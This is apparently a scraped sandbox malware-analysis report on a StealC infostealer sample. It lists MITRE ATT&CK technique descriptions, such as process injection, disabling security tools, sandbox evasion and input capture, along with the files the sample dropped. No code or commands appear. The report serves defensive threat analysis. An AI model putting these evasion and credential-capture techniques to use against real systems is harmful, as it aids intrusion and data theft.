Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report M13W1o3scc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_478F.tmp.exe_b15f1ed1fbe05deb7bf8632b253ff5c7eae35c3_ce0698c2_34045723-5be5-429e-9efc-972a5ba8c6e1\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D33.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DFF.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E3E.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\478F.tmp.exe

C:\Users\user\AppData\Local\Temp\773416\A

C:\Users\user\AppData\Local\Temp\773416\Welding.pif

C:\Users\user\AppData\Local\Temp\Bangladesh

C:\Users\user\AppData\Local\Temp\Completely

Windows Analysis Report
M13W1o3scc.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre